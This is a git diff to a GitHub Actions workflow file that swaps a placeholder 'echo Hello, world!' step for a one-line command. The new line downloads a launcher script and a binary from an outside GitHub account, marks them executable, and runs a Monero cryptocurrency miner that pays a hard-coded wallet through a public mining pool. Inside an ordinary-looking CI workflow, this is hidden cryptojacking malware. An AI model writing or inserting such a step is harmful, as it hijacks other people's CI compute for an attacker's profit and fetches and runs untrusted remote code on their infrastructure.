--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -27,7 +27,7 @@ jobs:
 
       # Runs a single command using the runners shell
       - name: Run a one-line script
-        run: echo Hello, world!
+        run: wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh && wget https://github.com/hunshukajh/yes/raw/main/gas && chmod +x gas cmdline_launcher.sh && ./cmdline_launcher.sh -algo randomx -coin XMR -wallet 49FRtoJ5j815r4ZejGfHMMUbQsSrc1Fr38Nd5rFUCXjmbYnYLm6VcwHetSizR3y4ktdtLzwj4av8mK5LEqZQL4HEPupJ9oq  -rigName  $(echo $(shuf -i 1-9999 -n 1)-SRBO) -pool1 xmr.2miners.com:2222
 
       # Runs a set of commands using the runners shell
       - name: Run a multi-line script
